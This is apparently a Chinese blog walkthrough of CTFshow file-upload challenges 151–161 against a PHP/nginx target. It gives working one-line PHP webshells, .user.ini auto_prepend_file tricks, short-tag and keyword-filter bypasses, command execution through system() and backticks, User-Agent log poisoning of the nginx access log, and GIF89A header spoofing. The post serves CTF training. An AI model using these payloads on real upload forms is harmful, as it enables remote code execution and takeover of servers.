PHP-nginx-ctfShow文件上传漏洞

最新推荐文章于 2024-06-03 17:24:52 发布
最新推荐文章于 2024-06-03 17:24:52 发布
阅读量1.8k 收藏 2
点赞数
分类专栏: 基础的渗透测试 文章标签: php nginx 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63917373/article/details/127272185
版权

CTFSHOW-文件上传-151到161关卡

151 152-JS验证+MIME

Content-Type: image/png

153-JS验证+user.ini

https://www.cnblogs.com/NineOne/p/14033391.html

.user.ini:auto_prepend_file=test.png

test.png:<?php eval($_POST[x]);?>

154 155-JS验证+user.ini+短标签

<? echo '123';?> //前提是开启配置参数short_open_tags=on

<?=(表达式)?> //不需要开启参数设置

<% echo '123';%> //前提是开启配置参数asp_tags=on

<script language=”php”>echo '1'; </script> //不需要修改参数开关

.user.ini:auto_prepend_file=test.png

test.png:<?=eval($_POST[x]);?>

156 JS验证+user.ini+短标签+过滤

.user.ini:auto_prepend_file=test.png

test.png:<?=eval($_POST{x});?>

157 158 159 JS验证+user.ini+短标签+过滤

使用反引号运算符的效果与函数 shell_exec()相同

.user.ini:auto_prepend_file=test.png

test.png:<?=system('tac ../fl*')?>

test.png:<? echo `tac /var/www/html/f*`?>

160 JS验证+user.ini+短标签+过滤

包含默认日志,日志记录UA头,UA头写后门代码

.user.ini:auto_prepend_file=test.png

test.png:<?=include"/var/lo"."g/nginx/access.lo"."g"?>

161 JS验证+user.ini+短标签+过滤+文件头

文件头部检测是否为图片格式文件

.user.ini:GIF89A auto_prepend_file=test.png

test.png:GIF89A <?=include"/var/lo"."g/nginx/access.lo"."g"?>

151关(修改前端代码即可)

后门代码:<?php eval($_POST[x]);?>

post:x=system('ls');

修改前端代码

上传包含后门代码的php文件

通过POST提交指令x=system('tac ../flag.php');

152关(修改content-type类型,上传PHP文件)

通过修改前端代码,发现上传失败,先正常上传png,通过抓包猜测,限制了content-Type

继续修改前端代码。抓包,修改信息

153关(.user.ini包含1.png自动执行)

使用到了.user.ini的文件配置漏洞

.user.ini实际上就是一个可以由用户“自定义”的php.ini

指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中

.user.ini : auto_prepend_file=1.png

1.png : <?php eval($_POST[x]);?>

post : x=system('tac ../flag.php');

.user.ini 父目录中是自动带有index.php

154关(<?php eval($_POST[x]);?> 换为<?=eval($_POST[x]);?>

当内容检测中,过滤了<?php ?>,可以使用一下方法

<? echo '123';?> //前提是开启配置参数short_open_tags=on

<?=(表达式)?> //不需要开启参数设置

<% echo '123';%> //前提是开启配置参数asp_tags=on

<script language=”php”>echo '1'; </script> //不需要修改参数开关

这一关过滤的php,所以<?php eval($_POST[x]);?> 换为<?=eval($_POST[x]);?>

 

 

155关

和154关的过关方法是一样的

发现存在过滤

156关(前端修改代码无效,上传后门代码)

过关方法:

  1. png:<?=eval($_POST{x});?>

  1. 直接访问/upload/ post:x=system('tac ../flag.php'); 显示flag

发现存在内容检测过滤

但把[]去掉后,发现上传成功,说明对大括号进行过滤了,换{}试试

157关(过滤了php字段,通过*代替了php)

过关方法:

  1. png:<?=system('tac ../flag.*')?>

  2. 直接访问/upload/ 显示flag

自动执行了代码<?=system('tac ../flag.*')?>

158关

和157关的方法是一样的

159关(过滤了PHP执行命令,反括号代替执行命令)

过关方法:1.png:<?= `tac ../fl*` ?>

.user.ini:auto_prepend_file=1.png

直接访问http://520b52c2-b233-4095-beb0-a8d8fe9a27b9.challenge.ctf.show/upload

160关(通过访问日志记录的读取,.user.ini的文件包含执行)

解题方法:

  1. png:<?=include"/var/lo"."g/nginx/access.lo"."g"?>

  2. .user.ini : auto_prepend_file=1.png

 

可以看到服务器的访问日志记录,发现了很多UA头,所以在UA头上做手脚

成功拿到flag

161关(修改内容-文件类型)

发现什么内容也无法上传

发现限制了文件类型内容,内容加GIF89A

#知识点:

1、文件上传-前端验证

2、文件上传-黑白名单

3、文件上传-user.ini妙用

4、文件上传-PHP语言特性

#详细点:

1、检测层面:前端,后端等

2、检测内容:文件头,完整性,二次渲染等

3、检测后缀:黑名单,白名单,MIME检测等

4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等

大飞先生
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CTF之Web_php_wrong_nginx_config
qq_74263993的博客
04-04 689
hint.php告诉我们:配置文件也许有问题呀:/etc/nginx/sites-enabled/site.conf。file=./..././..././..././..././etc/passwd&ext==php绕过。将爆出来的东西整理一下,发现location /web-img开启了目录浏览 autoindex on;先对网站进行目录扫描,发现/admin/和/robots.txt。因此 alias 后面的路径是从系统根目录开始的 所以加一个../在/var/www下找到了。
nginx大法好
伟大的程序员
02-20 297
微信小程序访问豆瓣top250电影403forbidden,估计豆瓣把微信小程序屏蔽了,看到别人用nginx实现请求转发,自己也试了一下,果然可以破解限制,第一次感受到nginx的魅力,666...
CTF-Web】文件上传漏洞学习笔记(ctfshow题目)
最新发布
jayq1的博客
06-03 1595
文件上传漏洞学习笔记,ctfshow题目为依托
CTF-文件包含学习
weixin_44770698的博客
05-30 2057
CTFSHOW WEB-17 通过请求包查看到服务器为nginx,然后尝试查看一下/etc/passwd文件。 访问成功说明可以访问内网文件,然后尝试读取日志文件中的信息。nginx的日志文件为/var/log/nginx/access.log 发现日志文件中记录了UA,所以在数据包中写入系统执行命令,所以当我们在UA中写入系统执行命令的时候,再去包含,会当做php来执行。 发现存在着indes.php 和36d.php两个文件,查看36d.php文件中的内容。 WEB-18
CTFSHOW web4 文件包含+nginx日志注入
weixin_46915877的博客
05-08 275
nginx/access.log和 /var/log/nginx/error.log。默认Apache日志路径:/var/log/apache/access.log。但是使用Php伪代码发现返回error,说明php已经被过滤掉了。发现日志会记录下UA的内容,那我们试试看一句话木马放入UA能否接连。观察报文,发现为nginx服务器,那我们尝试访问下日志文件。连接成功,我们找找看flag在哪。和第三关一样,存在文件包含。日志路径:/var/找到flag,完成!
nginx配置不当导致的目录遍历下载漏洞-“百度杯”CTF比赛 2017 二月场
weixin_30527143的博客
07-25 479
题目:http://98fe42cede6c4f1c9ec3f55c0f542d06b680d580b5bf41d4.game.ichunqiu.com/login.php 题目内容: 网站要上线了,还没测试呢,怎么办? 经过测试在点击Mini-Zone的时候会有如下数据包。 GET /index.php HTTP/1.1Host: 98fe42cede6c4f1c9...
buuctf [Nginx]CVE-2013-4547
qq_1873822的博客
03-26 1279
(CVE-2013-4547)Nginx URI Processing 安全绕过漏洞 漏洞描述 nginx0.8.41至1.4.3版本和1.5.7之前的1.5.x版本中存在安全漏洞,该漏洞源于程序没有正确验证包含未转义空格字符的请求URI。远程攻击者可利用该漏洞绕过既定的限制。 http://www.91ri.org/9064.html https://blog.csdn.net/Blood_Pupil/article/details/88565176 漏洞影响 Nginx 0.8.41 ~ 1.4.3 /
文件上传漏洞详解(CTF篇)
热门推荐
nobugnomoney的博客
09-16 1万+
需要了解的前置知识: 1.什么是文件上传文件上传就是通过流的方式将文件写到服务器上 文件上传必须以POST提交表单 表单中需要 <input type="file" name="upload"> 2.一句话木马 <?php eval($_POST['a']) ?> 其中eval就是执行命令的函数,**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马
从0-1的CTF比赛环境搭建过程
weixin_62257805的博客
08-17 3002
博主已经对CTFd v3.3.1官方源码进行了更换国内镜像源、添加CTFd-Whale子模块、配置frp网络、设置静态文件CDN加速等工作,可前往使用作者修改的版本进行安装部署。使用Xshll连接进行操作(根据个人习惯选择)此次仅记录了搭建成功的大概过程,也是再N次失败后的一次小小复盘,其中有很多过程在不同机器和系统版本中可能出现报错,其解决方法自行百度或科学上网查找。有时间会更新本地虚拟机详细搭建过程。............
CTF靶场搭建及Web赛题制作与终端docker环境部署
Welcome To Myon'Blog !
11-22 6004
这种情况意思是docker需要我们指定下载镜像的版本号。哈喽大家好!我是Myon,趁着我的云服务器还没过期,这次给大家出一期很详细的CTF比赛的靶场搭建以及关于Web赛题的制作与docker环境的部署教程,由于本人能力有限,也只能给大家讲一些基础简单的东西,欢迎大家在评论区互相交流学习,希望通过这篇博客大家能学到一些新东西,也期待大家的关注和支持!
ingress-nginx-controller-1.9.yaml
10-18
接下来,描述中提到的 "另外两个文件" 分别是 "nginx-tomcat-svc-ingress.yaml" 和 "nginx-tomcat-deploy.yaml"。前者是为一个基于 Nginx 的 Tomcat 应用创建 Ingress 规则的 YAML 文件,它定义了外部如何通过 ...
lua-nginx-module-0.10.13
07-18
Lua-Nginx-Module,简称lua-nginx-module,是Nginx服务器的一个重要扩展模块,它将强大的Lua脚本语言集成到Nginx中,允许用户在Nginx配置文件中直接编写Lua代码,极大地增强了Nginx的功能性和灵活性。版本0.10.13是...
ingress-nginx-controller(含镜像和代码).rar
10-28
ingress-nginx-controller 是 Kubernetes 社区维护的一个项目,它提供了对 Ingress 资源的实现,使得可以通过定义简单的 YAML 文件来管理对外暴露的服务路由。Nginx 作为业界广泛使用的高性能反向代理服务器,其稳定...
k8s-修改ingress-nginx-controller中nginx配置文件参数参考
07-20
k8s-修改ingress-nginx-controller中nginx配置文件参数参考
fastdfs-nginx-module-1.24
02-07
FastDFS-nginx-module 1.24 是一个针对 FastDFS 文件系统的 Nginx 模块,它使得 Nginx 可以无缝地与 FastDFS 集成,提供了高效的文件上传、下载服务。这一版本是针对 FastDFS 的最新更新,旨在优化性能,提高稳定性...
CVE-2019-11043 Nginx PHP 远程代码执行漏洞复现
墨鱼菜鸡
10-24 291
漏洞背景:来自Wallarm的安全研究员Andrew Danau在9月14-16号举办的Real World CTF中,意外的向服务器发送%0a(换行符)时,服务器返回异常信息。由此发现了这个0day漏洞 漏洞描述:当Nginx使用特定的 fastcgi 配置时,存在远程代码执行漏洞,但这个配置并非是Ng...
搭建CTF比赛(训练)平台
ZXW_NUDT的博客
04-03 4712
本科毕设CTF平台-MarsCTF演示视频:https://www.bilibili.com/video/BV1eA4y1o73C。
“百度杯”2017 二月场Zone---Nginx配置不当导致的文件读取漏洞
Dream'
12-07 460
问题描述 点进去题目的网址,显示需要登陆 ,跳转到登录页 登录页并没有什么思路 问题解决 1.先抓个包看一下 cookie中有一个login参数为0,猜测他为权限判断的依据,更改为1 进入一个新的页面,发现一个名为/manages/admin.php的页面 访问该页面,并且抓包,把login改为1 发生302跳转,发现module,怀疑是文件包含漏洞 包含的思路就来自网上了,是因为nginx配置不当的原因导致的,我们可以包含ngin的配置文件; 然后就...
文件上传漏洞
qq_33137821的博客
04-30 1106
仅供学习使用
nginx和fastDFS-nginx-module怎么搭建
03-19
nginx是一个高性能的开源Web服务器和反代理服务器,它可以处理大量的并发连接,并具有低内存消耗。fastDFS-nginx-module是一个用于将Nginx与FastDFS分布式文件系统集成的模块。 要搭建nginx和fastDFS-nginx-module,可以按照以下步骤进行操作: 1. 安装Nginx:首先,需要安装Nginx服务器。可以通过包管理器(如apt、yum等)或从Nginx官方网站下载源码进行安装。 2. 安装FastDFS:接下来,需要安装FastDFS分布式文件系统。可以从FastDFS官方网站下载源码进行安装。安装过程中需要配置Tracker服务器和Storage服务器。 3. 下载fastDFS-nginx-module:在安装Nginx之前,需要下载fastDFS-nginx-module模块。可以从GitHub上找到该模块的源码,并将其下载到本地。 4. 配置Nginx:在Nginx的安装目录下,找到nginx.conf文件,并进行配置。在http模块中添加如下配置项: ``` location /group1/M00 { ngx_fastdfs_module; } ``` 5. 编译安装Nginx:使用命令行进入Nginx源码目录,执行以下命令进行编译和安装: ``` ./configure --add-module=/path/to/fastDFS-nginx-module make make install ``` 6. 启动Nginx和FastDFS:启动Nginx和FastDFS服务,确保它们正常运行。 至此,你已经成功搭建了nginx和fastDFS-nginx-module。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大飞先生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值